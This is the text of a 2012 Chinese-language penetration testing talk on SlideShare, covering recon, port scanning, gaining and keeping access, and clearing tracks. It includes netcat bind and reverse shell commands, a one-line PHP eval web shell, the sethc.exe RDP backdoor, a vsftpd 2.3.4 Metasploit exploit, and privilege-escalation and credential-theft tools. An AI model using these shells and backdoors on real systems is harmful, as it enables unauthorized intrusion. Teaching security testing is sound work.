Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.
滲透測試Orange @ NISRA 2012 / 05 / 22
目的1. 以駭客、攻擊者的眼光、手法,對系統進   行安全性測試2. 我們都是好孩子,要經過授權唷!^___^3. 基礎概念取向 – 技術 Detail 不講 – Web-based 自成一個章節不講
不專業的人來講專業的東西...
1.   Reconnaissance2.   Scanning3.   Gaining Access4.   Maintaining Access5.   Clearing Tracks說是這樣說拉,不過實際上...
Reconnaissance用盡一切方法拐到資訊1. Google          # 想想人肉搜索2. Who.is3. DNS Zone transfer目標是? 有沒有防火牆? IDS? WAF? 網路架構長怎樣? 網頁伺服器是不是 V...
資訊越多,入侵機會越多服務越多,入侵機會越多
Google://"mail.xxx.xxx.xx"
http://whois.sc/
Cont. 案例分享• 利用 code.google.com 進行滲透測試。• 還記得上禮拜教的 Git 嗎?
Scanning1. 觀察、分析、思考。2. Scanning Port # Nmap3. 弱點掃描          # Nessus, Metasploit                   # WebInspect, Acunetix3...
Cont. 案例分享• *經典範例*• RDP 後門 – sethc.exe• 連上遠端桌面第一件事不是打帳號,是快  速按下 shift 五次!!• 同理,看到登錄畫面第一件事是猜密碼、  預設密碼。
一般的應該像這樣
不太正常的會長得像這樣
比較有創意的會弄成這樣
比較有點 Level 又會這樣做
淡定低調風 ˊ_>ˋ
Scanning port• Port   = 埠、端口、窗戶         = 主機提供服務的窗口         = 有機會入侵的地方•   範圍從 1 到 65535•   21   =   FTP•   23   =   TELNET...
檢查窗戶有沒有開?• telnet www.google.com 80• Netcat  – nc www.google.com 80
NetCat         http://sectools.org/
折凳的奧妙之處,就是可以藏在民宅之中,隨手可得,還可以坐著它來隱藏殺機,打完更可以坐下休息,就算被條子抓到也告不了你,真不愧為七大武器之首!
NetCat Usage•   nc apple.com 80 # 檢查 port 開啟是否•   nc apple.com 1-100   # 一次掃描多個 port•   nc -v apple.com 80   # 詳細模式•   nc ...
NetCat 可以幹嘛? (1/3)• 範例主角 Cyndi & 大樹哥• Cyndi 要看 大樹 的網頁伺服器開了沒? – Cyndi :   nc 大樹 80• Cyndi 要傳檔案給 大樹 – 大樹 :      nc -lp 12345...
NetCat 可以幹嘛? (2/3)• Cyndi 入侵了 大樹 的電腦,想建個後門 – Cyndi 在 大樹 的電腦執行 : – nc -lp 888 -e cmd.exe – Cyndi: nc 大樹 888 即可連上後門         ...
NetCat 可以幹嘛? (2/3)• 大樹 裝了防火牆,又是在內網,怎麼辦 ? – 動動腦,三秒鐘把後門改造成 反連後門( Back   connect) – Cyndi 執行 : nc -lp 888 – Cyndi 在 大樹 電腦執行 :...
NMAP Usage• http://nmap.org/  – nmap -sT 127.0.0.1          # 起手式  – nmap -sT -v 127.0.0.1 # 詳細模式  – nmap -sT 127.0.0.1-25...
實作• 請用 nmap 找出 orangee.tw 開了網頁伺服  器再奇怪的 port 上
Gaining Access1. 關鍵點,請善用盡上一步取得的資訊。2. 存取權限分為 Read Write eXecute3. 失敗請退回上一步。• http://exploit-db.com/• Metasploit
http://exploit-db.com/
Cont. 案例分享• CVE-2012-1823  – PHP CGI Argument Injection• 為啥講它?
http://ww.facebook.com/?-s
Reconnaissance
Scanning
Gaining Access       <?php @eval($_POST[cmd]); ?>
Metasploit (1/2)
Metasploit (2/2)• Exploits• Auxiliary• Payload
實作 (有時間的話)1. 使用 nmap 發現有開 FTP 服務2. 使用 nc 連接發現 FTP 是由 vsftp 架設並   且版本是 2.3.43. 透過 exploit-db 搜尋發現 vsftp 2.3.4 存在   backdoor...
Maintaining Access1.   普通使用者 vs. 最強使用者2.   提權 ( Privilege Escalation )3.   翻屍體4.   如何想來就來想走就走!     – 後門 Backdoor     – 木馬 ...
實作 ( 詳細指令在 txt 裡 )1. Mimikatz  – 原理會提一下,不懂就算了XD2. Enlightenment.tgz  – 懶人包3. Mempodipper.c  – 原理聽聽就算了XD
Clearing Tracks1. 俗稱的擦屁屁2. 任何動作都會留下紀錄3. 壞事不要幹,要幹就要懂的保護自己舉例:
傻傻的• 保護當事人,徹圖
安全的本質是什麼?    http://hi.baidu.com/yuange1975/blog
ThanksOrange@nisra.net
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra
Nächste SlideShare
Wird geladen in …5
×

滲透測試 Talk @ Nisra

10.565 Aufrufe

Veröffentlicht am

Orange @ NISRA
2012 / 05 / 22

Veröffentlicht in: Technologie
  • Loggen Sie sich ein, um Kommentare anzuzeigen.

滲透測試 Talk @ Nisra

  1. 1. 滲透測試Orange @ NISRA 2012 / 05 / 22
  2. 2. 目的1. 以駭客、攻擊者的眼光、手法,對系統進 行安全性測試2. 我們都是好孩子,要經過授權唷!^___^3. 基礎概念取向 – 技術 Detail 不講 – Web-based 自成一個章節不講
  3. 3. 不專業的人來講專業的東西...
  4. 4. 1. Reconnaissance2. Scanning3. Gaining Access4. Maintaining Access5. Clearing Tracks說是這樣說拉,不過實際上...
  5. 5. Reconnaissance用盡一切方法拐到資訊1. Google # 想想人肉搜索2. Who.is3. DNS Zone transfer目標是? 有沒有防火牆? IDS? WAF? 網路架構長怎樣? 網頁伺服器是不是 Virtual host ?
  6. 6. 資訊越多,入侵機會越多服務越多,入侵機會越多
  7. 7. Google://"mail.xxx.xxx.xx"
  8. 8. http://whois.sc/
  9. 9. Cont. 案例分享• 利用 code.google.com 進行滲透測試。• 還記得上禮拜教的 Git 嗎?
  10. 10. Scanning1. 觀察、分析、思考。2. Scanning Port # Nmap3. 弱點掃描 # Nessus, Metasploit # WebInspect, Acunetix3. 猜密碼 # Hydra, Ncrack – 空密碼, 123456, 帳密相同 – 帳號永遠比密碼難猜
  11. 11. Cont. 案例分享• *經典範例*• RDP 後門 – sethc.exe• 連上遠端桌面第一件事不是打帳號,是快 速按下 shift 五次!!• 同理,看到登錄畫面第一件事是猜密碼、 預設密碼。
  12. 12. 一般的應該像這樣
  13. 13. 不太正常的會長得像這樣
  14. 14. 比較有創意的會弄成這樣
  15. 15. 比較有點 Level 又會這樣做
  16. 16. 淡定低調風 ˊ_>ˋ
  17. 17. Scanning port• Port = 埠、端口、窗戶 = 主機提供服務的窗口 = 有機會入侵的地方• 範圍從 1 到 65535• 21 = FTP• 23 = TELNET• 80 = WWW
  18. 18. 檢查窗戶有沒有開?• telnet www.google.com 80• Netcat – nc www.google.com 80
  19. 19. NetCat http://sectools.org/
  20. 20. 折凳的奧妙之處,就是可以藏在民宅之中,隨手可得,還可以坐著它來隱藏殺機,打完更可以坐下休息,就算被條子抓到也告不了你,真不愧為七大武器之首!
  21. 21. NetCat Usage• nc apple.com 80 # 檢查 port 開啟是否• nc apple.com 1-100 # 一次掃描多個 port• nc -v apple.com 80 # 詳細模式• nc -l -p 80 # 開 (listen) 一個 port• nc -e cmd.exe -lp 80 # 將執行內容綁到連線上
  22. 22. NetCat 可以幹嘛? (1/3)• 範例主角 Cyndi & 大樹哥• Cyndi 要看 大樹 的網頁伺服器開了沒? – Cyndi : nc 大樹 80• Cyndi 要傳檔案給 大樹 – 大樹 : nc -lp 12345 > a.zip – Cyndi : nc 大樹 12345 < a.zip
  23. 23. NetCat 可以幹嘛? (2/3)• Cyndi 入侵了 大樹 的電腦,想建個後門 – Cyndi 在 大樹 的電腦執行 : – nc -lp 888 -e cmd.exe – Cyndi: nc 大樹 888 即可連上後門 888
  24. 24. NetCat 可以幹嘛? (2/3)• 大樹 裝了防火牆,又是在內網,怎麼辦 ? – 動動腦,三秒鐘把後門改造成 反連後門( Back connect) – Cyndi 執行 : nc -lp 888 – Cyndi 在 大樹 電腦執行 : – nc -e cmd.exe Cyndi 888 888
  25. 25. NMAP Usage• http://nmap.org/ – nmap -sT 127.0.0.1 # 起手式 – nmap -sT -v 127.0.0.1 # 詳細模式 – nmap -sT 127.0.0.1-254# IP range – nmap -sT -p 80 127.0.0.1 # 指定端口 – nmap -sT -p 1-8 127.0.0.1 # Port range – nmap -A 127.0.0.1 # 檢測作業系統
  26. 26. 實作• 請用 nmap 找出 orangee.tw 開了網頁伺服 器再奇怪的 port 上
  27. 27. Gaining Access1. 關鍵點,請善用盡上一步取得的資訊。2. 存取權限分為 Read Write eXecute3. 失敗請退回上一步。• http://exploit-db.com/• Metasploit
  28. 28. http://exploit-db.com/
  29. 29. Cont. 案例分享• CVE-2012-1823 – PHP CGI Argument Injection• 為啥講它?
  30. 30. http://ww.facebook.com/?-s
  31. 31. Reconnaissance
  32. 32. Scanning
  33. 33. Gaining Access <?php @eval($_POST[cmd]); ?>
  34. 34. Metasploit (1/2)
  35. 35. Metasploit (2/2)• Exploits• Auxiliary• Payload
  36. 36. 實作 (有時間的話)1. 使用 nmap 發現有開 FTP 服務2. 使用 nc 連接發現 FTP 是由 vsftp 架設並 且版本是 2.3.43. 透過 exploit-db 搜尋發現 vsftp 2.3.4 存在 backdoor !!4. 使用 Metasploit 進行攻擊 – unix -> ftp -> vsftpd234 backdoor
  37. 37. Maintaining Access1. 普通使用者 vs. 最強使用者2. 提權 ( Privilege Escalation )3. 翻屍體4. 如何想來就來想走就走! – 後門 Backdoor – 木馬 Trojan – 乳器 Rootkit
  38. 38. 實作 ( 詳細指令在 txt 裡 )1. Mimikatz – 原理會提一下,不懂就算了XD2. Enlightenment.tgz – 懶人包3. Mempodipper.c – 原理聽聽就算了XD
  39. 39. Clearing Tracks1. 俗稱的擦屁屁2. 任何動作都會留下紀錄3. 壞事不要幹,要幹就要懂的保護自己舉例:
  40. 40. 傻傻的• 保護當事人,徹圖
  41. 41. 安全的本質是什麼? http://hi.baidu.com/yuange1975/blog
  42. 42. ThanksOrange@nisra.net

×